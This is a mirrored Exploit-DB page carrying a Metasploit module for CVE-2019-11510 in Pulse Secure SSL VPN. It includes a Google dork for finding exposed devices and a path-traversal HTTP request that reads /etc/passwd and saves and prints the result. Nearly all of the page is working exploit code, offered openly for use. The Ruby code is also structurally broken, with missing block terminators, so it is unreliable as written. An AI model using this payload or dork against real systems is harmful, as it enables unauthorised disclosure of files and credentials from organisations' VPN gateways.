Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN – Arbitrary File Disclosure (Metasploit) - 体验盒子

作者： Alyssa Herrera

日期： 2019-08-21

类别：

webapps

平台：

multiple

来源：https://www.exploit-db.com/exploits/47297/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)

# Google Dork: inurl:/dana-na/ filetype:cgi

# Date: 8/20/2019

# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera

# Vendor Homepage: https://pulsesecure.net

# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

# Tested on: Linux

# CVE : CVE-2019-11510

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

include Msf::Post::File

def initialize(info = {})

super(update_info(info,

'Name' => 'Pulse Secure - System file leak',

'Description'=> %q{

Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.

This exploit reads /etc/passwd as a proof of concept

This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

},

'References' =>

[

[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]

],

'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],

'License'=> MSF_LICENSE,

'DefaultOptions' =>

{

'RPORT' => 443,

'SSL' => true

},

))

end

def run()

print_good("Checking target...")

res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)

if res && res.code == 200

print_good("Target is Vulnerable!")

data = res.body

current_host = datastore['RHOST']

filename = "msf_sslwebsession_"+current_host+".bin"

File.delete(filename) if File.exist?(filename)

file_local_write(filename, data)

print_good("Parsing file.......")

parse()

else

if(res && res.code == 404)

print_error("Target not Vulnerable")

else

print_error("Ooof, try again...")

end

def parse()

current_host = datastore['RHOST']

fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")

words = 0

while (line = fileObj.gets)

printable_data = line.gsub(/[^[:print:]]/, '.')

array_data = printable_data.scan(/.{1,60}/m)

for ar in array_data

if ar != "............................................................"

print_good(ar)

end

#print_good(printable_data)

end

fileObj.close

end